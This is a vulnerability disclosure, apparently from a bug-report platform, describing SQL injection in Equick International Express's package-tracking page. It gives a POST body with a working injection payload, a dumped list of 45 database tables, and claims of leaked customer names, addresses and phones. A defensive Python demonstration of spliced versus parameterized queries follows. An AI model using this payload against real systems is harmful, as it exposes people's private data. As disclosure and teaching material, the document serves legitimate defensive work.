Equick International Express main site SQL injection (leakage of express delivery information)
As titled.
Leaked data: name, waybill time, address, phone number, cargo and other express delivery details.
Main Site:
http://**.**.**.**/index.aspx
Vulnerability address:
http://**.**.**.**/pPackageTraceQuery.aspx
POST body:
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%login%3D&__EVENTVALIDATION=%login&left2%24LoginType=1&left2%24USERID=&left2%24PASSWORD=&EQUICKEXPRESSID=a%27and+1=user--&ImageButton1.x=40&ImageButton1.y=14
Injectable parameter: EQUICKEXPRESSID
Ran it directly through a tool.
Database information exposed:
Data tables
Database: EquickOC_Home [45 tables]
+----------------------------+
| BookColaForm               |
| BookingFormEOC             |
| BookingFormEOCGoods        |
| BookingFormEOCHistory      |
| BookingFormEOCRecycleBin   |
| BookingFormTrace           |
| BookingFormTraceHistory    |
| ClienteleInfo              |
| ClienteleSelect            |
| Company                    |
| Consumer                   |
| Country                    |
| Customer                   |
| DataDick                   |
| EBAYGOODLINK               |
| EBAYKINDLINK               |
| EBAYUSER                   |
| EC_ORDENOREPL              |
| EC_SENDMAIL                |
| EC_USERACCELOG             |
| MenuBand                   |
| MultiHTML                  |
| MultiUnion                 |
| Nonce                      |
| PrePayment                 |
| PrePaymentMelt             |
| Purview                    |
| Questions                  |
| QuestionsItems             |
| QuickType                  |
| QuickTypeService           |
| QuickTypeTrace             |
| SequenceNo                 |
| TABLE_COUNTRY              |
| TABLE_INSIDEMAILS          |
| TABLE_MAILPACKAGE          |
| TABLE_MAILPACKAGE_SENDINFO |
| TABLE_NEWS                 |
| TABLE_PAYTMP               |
| TABLE_QUICKPAY             |
| TABLE_SYSTEMDATA           |
| TABLE_USERS                |
| TABLE_WEIGHTPRICE          |
| delme_table_news           |
| dst2q                      |
+----------------------------+
Data Volume
Data proof
Leaked data: name, waybill time, address, phone number, cargo and other express delivery details.
Proof of concept only; no further exploitation was carried out.
Solution:
Filter the input.
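The following is an added example (not code from the report or from the Equick site) that reproduces the defect class behind the EQUICKEXPRESSID parameter and the "filter" fix in a self-contained SQLite stand-in. The table and column names, the sample rows and the allowlist pattern for a waybill number are assumptions made for the example. It runs the report's own decoded payload (a'and 1=user--) against three variants of the tracking lookup: the string-spliced query that lets the SQL engine parse user input as SQL (in SQLite this surfaces as an unknown-column error on `user`, the same class of error-based symptom the report relies on), the parameterized query that treats the whole value as a literal, and the hardened version that first applies an input allowlist and then parameterizes.

```python
import re
import sqlite3

# Constructed sample rows standing in for the express records the report says
# leak (name, waybill time, address, phone, cargo). Table and column names are
# assumptions for this example, not the site's real schema.
SAMPLE_ROWS = [
    ("EQ1001", "Alice", "2014-01-01 10:00", "Beijing", "138-0000-0000", "books"),
    ("EQ1002", "Bob", "2014-01-02 11:30", "Shanghai", "139-0000-0000", "shoes"),
]

# The report's EQUICKEXPRESSID value after URL decoding:
#   a%27and+1=user--  ->  a'and 1=user--
REPORTED_PAYLOAD = "a'and 1=user--"


def make_db():
    """In-memory SQLite stand-in for the tracking table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE BookingFormTrace ("
        "expressid TEXT, name TEXT, waybill_time TEXT, "
        "address TEXT, phone TEXT, cargo TEXT)"
    )
    conn.executemany("INSERT INTO BookingFormTrace VALUES (?,?,?,?,?,?)", SAMPLE_ROWS)
    return conn


def trace_query_vulnerable(conn, express_id):
    """The defect class behind the report: the parameter is spliced into SQL text."""
    sql = (
        "SELECT name, waybill_time, address, phone, cargo "
        "FROM BookingFormTrace WHERE expressid = '" + express_id + "'"
    )
    return conn.execute(sql).fetchall()


def trace_query_parameterized(conn, express_id):
    """Fixed form: the value travels as a bound parameter, never as SQL syntax."""
    sql = (
        "SELECT name, waybill_time, address, phone, cargo "
        "FROM BookingFormTrace WHERE expressid = ?"
    )
    return conn.execute(sql, (express_id,)).fetchall()


# Allowlist for the waybill number; "1 to 32 alphanumeric characters" is an
# assumption about what a legitimate express ID looks like.
EXPRESS_ID_RE = re.compile(r"[A-Za-z0-9]{1,32}")


def is_valid_express_id(value):
    """The 'filter' from the report's solution: reject anything off the allowlist."""
    return EXPRESS_ID_RE.fullmatch(value) is not None


def trace_query_hardened(conn, express_id):
    """Filter first, then parameterize: defence in depth for the reported parameter."""
    if not is_valid_express_id(express_id):
        raise ValueError("EQUICKEXPRESSID rejected by input filter")
    return trace_query_parameterized(conn, express_id)


def classify(conn, express_id, query_fn):
    """Summarise what a query variant does with a given input."""
    try:
        rows = query_fn(conn, express_id)
    except sqlite3.OperationalError as exc:
        # The SQL engine parsed part of the input as SQL: the injection symptom.
        return ("sql-error", str(exc))
    except ValueError as exc:
        return ("rejected", str(exc))
    return ("rows", rows)


if __name__ == "__main__":
    db = make_db()
    for fn in (trace_query_vulnerable, trace_query_parameterized, trace_query_hardened):
        print(fn.__name__, classify(db, REPORTED_PAYLOAD, fn))
```

Running the block prints one line per variant: the spliced query fails inside the database with "no such column: user" (proof that the quote and the trailing `--` were interpreted as SQL), the parameterized query simply returns no rows, and the hardened query rejects the value before it reaches the database. The allowlist alone is not the fix; the bound parameter is what removes the injection, and the filter shortens the error path and gives a clean signal to log.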